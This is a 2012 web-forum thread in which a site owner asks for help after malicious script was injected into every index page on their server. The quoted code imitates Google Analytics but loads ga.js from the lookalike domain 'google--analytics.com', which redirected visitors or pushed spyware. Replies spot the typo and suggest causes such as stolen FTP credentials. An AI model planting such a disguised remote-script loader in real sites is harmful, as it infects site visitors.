Website hacked

1337_KR3W · 6 Feb 2012 at 20:53

Every website on my server had its index.html/php edited yesterday.

I'm restoring a backup, deleting all old ftp accounts etc as can't be sure how they got in, but the code below crops up in every document.

At first I thought it was Google analytics and overlooked it, but removing it causes the pages to behave normally again, being a novice could anyone explain for me if this is the problem code, and what it is doing?

Thank you!

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXX-X']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google--analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>

markeh · 6 Feb 2012 at 21:19

As far as I can tell, it is stock google analytics tracking code....

although it does have an extra dash in this line:

ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google--analytics.com/ga.js';

between 'google' and 'analytics', it's possible that there's a domain at the URL which has a a javascript file called ga.js that's doing nefarious stuff.

markeh · 6 Feb 2012 at 21:28

just checked it out, google--analytics.com is a dodgy url, remove the script from wherever you find it.

hargi · 6 Feb 2012 at 21:33

how did you notice something was wrong? or was it when you was updating the code?

I never really check sites unless im updating

Pho · 6 Feb 2012 at 22:00

Do you run any PHP/CGI/ASP/etc scripts, or third party applications? (Wordpress, Joomla, osCommerce etc)?

1337_KR3W · 6 Feb 2012 at 22:19

Run wordpress with shopperpress plugin on 2 sites, the rest are all static pages, seems one of the root ftp accounts was used and edited all index.* sites inserting the code after <body> tags.

Had checked it against the stock analytics code and hadn't noticed the extra dash, very well spotted!

Noticed it was dodgy because all the sites stopped loading, either redirected to bing, or tried to install spyware.

Pho · 6 Feb 2012 at 23:17

Ah, the password could have been stolen from a PC which logged into your site then.

It's always a good idea to keep things like Wordpress up to date, exploits for old versions are a common attack vector.

Rich · 9 Feb 2012 at 20:21

Dictionary Attack/Brute Force? Check for repeated failed logins against the server...